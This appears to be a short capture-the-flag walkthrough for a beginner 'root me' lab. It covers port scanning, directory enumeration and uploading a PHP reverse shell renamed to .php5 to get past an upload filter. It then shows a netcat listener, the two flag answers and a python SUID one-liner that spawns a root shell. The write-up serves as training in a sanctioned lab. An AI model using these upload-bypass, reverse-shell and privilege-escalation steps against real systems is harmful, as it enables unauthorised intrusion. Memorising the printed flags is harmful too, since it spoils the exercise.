A ctf for beginners, can you root me?
Scan ports using nmap
nmap -A -T4 10.10.124.205
We found 2 open ports 22 (ssh) and 80 (http)
Go to web page and view source, nothing here
We use gobuster to enummerate directory on web server
gobuster dir -u http://10.10.124.205/ -w /usr/share/wordlists/dirb/common.txt -t 30
we can see hidden directory called /panel/
we access to /panel/ directory and see a page like this
This step requires us to upload a webshell, in Kali has one /usr/share/webshells/php/php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php reverse.php
vi reverse.php
at line 49,50 change ip to your machine and port is 4444 (you can choose another)
Let's upload it to the panel
Looks like the exploit is being declined, let search file upload bypass php
So we can change its extension to .phtml, .php, .php3, .php4, .php5, and .inc
mv reverse.php reverse.php5
the trick has successful
Now we need to setup netcat on our machine to listen reverse shell
nc -lnvp 4444
back to gobuster output, go to /uploads/ directory
open it and go back the netcat
the answer on this location
find / -name user.txt 2>/dev/null
| Flag | user.txt |
|---|---|
| Answer | THM{y0u_g0t_a_sh3ll} |
The first step is to search for files with SUID permissions
find / -user root -perm /4000 2>/dev/null
we found a lot of files with SUID permissions
i can see /usr/bin/python that mean we can execute python with root privileges
using gtfobins/python/suid, i found a command
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
| Flag | root.txt |
|---|---|
| Answer | THM{pr1v1l3g3_3sc4l4t10n} |